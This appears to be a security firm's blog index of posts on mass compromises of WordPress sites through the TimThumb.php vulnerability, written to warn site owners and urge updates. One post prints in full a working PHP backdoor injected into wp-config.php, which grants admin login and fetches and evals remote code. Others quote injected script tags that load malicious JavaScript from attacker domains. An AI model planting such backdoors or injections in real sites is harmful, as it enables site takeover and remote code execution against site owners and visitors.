TimThumb.php Attacks – Now Being Used for Blackhat Spam SEO and Might Break Your Site

We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating that script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.

What we are seeing now is sites getting compromised to load links for blackhat seo purposes. They have their wp-settings.php modified with the following code:


Read More

TimThumb.php attacks – Now using googlesafebrowsing dot com

We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating the script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.

What we are seeing now is a small modification to the attack method. Instead of modifying the .htaccess or infecting the jquery.js or l10n.js scripts within WordPress core, they are modifying the header.php of the compromised WordPress site with this code:


Read More

Mass Infection of WordPress Sites Due to TimThumb ( counter-wordpress dot com )

Many people are asking us about this “counter-wordpress.com” type of malware, so we will post some details here. Our scanner has been identifying it for a while, so if you think your site is compromised, just check it in there.

So first, to make things clear, this is happening on sites that include the vulnerable timthumb.php script on them. You have to make sure that none of your themes or plugins are vulnerable. You can get more information here on how to verify it: TimThumb PHP Vulnerability – Just the Tip of the Iceberg. This is not a vulnerability on WordPress.

Understanding the problem

Since the vulnerability on TimThumb was released (0-day), we started to see many scans in our logs looking for that script. Once it is found, the attackers will do many things:

Read More

Attacks Against Timthumb.php in the Wild – List of Themes and Plugins Being Scanned

We are seeing large scale attacks against the vulnerable timthumb.php script in the wild. Thousands of sites are getting compromised and if you have it in your WordPress site, you better get it fixed right now!

After a few days analyzing the compromised sites and many log files, here are the plugins we’ve seen getting scanned by the attackers (total of 25):

Read More

WordPress sites with .htaccess hacked

The TimThumb.php vulnerability is causing a lot of WordPress sites to get compromised with the superpuperdomain.com and superpuperdomain2.com remote JavaScript injection.

However, that’s not all that it is doing. On many of the sites we are analyzing, the .htaccess file is also getting modified to redirect search engine and organic traffic to some Russian domains. Here is what we’re seeing in the compromised .htaccess files:

Read More

TimThumb.php Vulnerability Not Only Affecting Themes – Plugins too

The Timthumb.php vulnerability is being used in the wild to hack and infect thousands of WordPress sites.

Hopefully everyone is checking their themes and updating the script to make sure it is not vulnerable. This is wishful thinking.

Unfortunately, the issue is not limited to themes alone. There are some plugins that include the TimThumb.php script, and you need to check and update them as well (if you are not sure how to do so, check out this post, we’ve include a script to automate it for you).

Read More

Non-Stop Attacks Against osCommerce – Time to Take Action

The malware attacks against osCommerce sites are still going at full force and the site owners have to take action to secure and update their sites as soon as possible. Think about that, with so many valuable targets (online stores) that are not updated and secured, why would they stop attacking now?


*If you have an osCommerce site, please follow these steps to make sure it doesn’t keep getting hacked. You can also scan it to check if it’s clean: Sucuri SiteCheck



Read More

Update to the Superpuperdomain2.com malware

Just a quick update to the Superpuperdomain2.com/Superpuperdomain.com malware infection that has been affecting thousands of WordPress sites with the vulnerable timthumb.php script.

You can read more about it here: http://blog.sucuri.net/2011/08/wordpress-sites-hacked-with-superpuperdomain2-com.html

But now the attackers are also adding the following code to the wp-config.php of the hacked sites:

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == ’66f041e16a60928b05a7e228a89c3799′){
if ($_GET['pingnow']== ‘login’){
$user_login = ‘admin’;
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action(‘wp_login’, $user_login);
}
if (($_GET['pingnow']== ‘exec’)&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).’.php’;
$fp = fopen($fnm, “w”);
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo “<SCRIPT LANGUAGE=\"JavaScript\”>location.href=’$fnm’;</SCRIPT>”;
}
if (($_GET['pingnow']== ‘eval’)&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

It acts as a backdoor, so they can control the site and add more injections/malware whenever they want. If you are running WordPress, check if your theme (or plugin) have this timthumb.php script. If it has, update or remove it now! You can also scan it here to see if it is infected: http://sitecheck.sucuri.net.

Thanks,

WordPress Sites Hacked with Superpuperdomain2.com

A few days ago we posted about a series of attacks that were happening against WordPress sites running the vulnerable timthumb.php script.

We detected thousands of sites compromised with it and now are are seeing a small change in the malware. Instead of superpuperdomain.com, the malware is now pointing to a remote javascript from superpuperdomain2.com (see extra 2 in there). This is what it shows up in the compromised sites:

<script language="javascript" SRC="http://superpuperdomain2.com/count.php?ref="

That is code is generated by an echo statement hidden within one of the WordPress core files and is always accompanied of multiple backdoors and even .htaccess redirections (to http://generation-internet.ru and other russian sites).

Both domains were registered by Archil Karsaulidze (probably fake) and are pointing to 91.196.216.20:

Archil Karsaulidze admin@superpuperdomain.com
+74957261532 fax: +74957261532
Novopeschanaya, 3-28
Moscow Moscowscaya Oblast 107263
ru

How are the sites getting compromised?

On the sites we’ve analyzed, they were hacked through the timthumb.php vulnerability that was published a few days ago. The attackers are also creating a bunch of backdoors to maintain their access to the hacked sites.

If you are using the timthumb.php scripts, remove or update it now!.

Keeping yourself secure

This is not a vulnerability in WordPress, it is a vulnerability found in various WordPress themes that include TimThumb! You have to make sure that you are using an updated theme, and from a legitimate source. Otherwise your theme may contain this vulnerability, or others (even backdoors), that may not be given the proper attention by their theme authors.

If you’re not sure, you can do a free scan of your site using Sucuri SiteCheck

WordPress Sites Hacked with Superpuperdomain dot com (Attacking Timthumb.php)

We are seeing a large number of WordPress sites compromised with a malicious JavaScript loading from superpuperdomain.com/count.php. That JavaScript redirects visitors that were going to the WordPress site to fake search engines.

This is what shows up at the bottom of the hacked sites:

<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref=http%3A%2F%2Fsite.com%2Fdif%2F"></script>

This script basically loads a bunch of encoded JavaScript that redirects the user to www.upliftsearch.com, www.filmannex.com and other “search engines” full of ads.

How are the sites getting compromised?

On the sites we’ve analyzed, they were hacked through the timthumb.php vulnerability that was published a few days ago. The attackers are also creating a bunch of backdoors to maintain their access to the hacked sites.

If you are using the timthumb.php scripts, remove or update it now!.

Keeping yourself secure

This is not a vulnerability in WordPress, it is a vulnerability found in various WordPress themes that include TimThumb! You have to make sure that you are using an updated theme, and from a legitimate source. Otherwise your theme may contain this vulnerability, or others (even backdoors), that may not be given the proper attention by their theme authors.

If you’re not sure, you can do a free scan of your site using Sucuri SiteCheck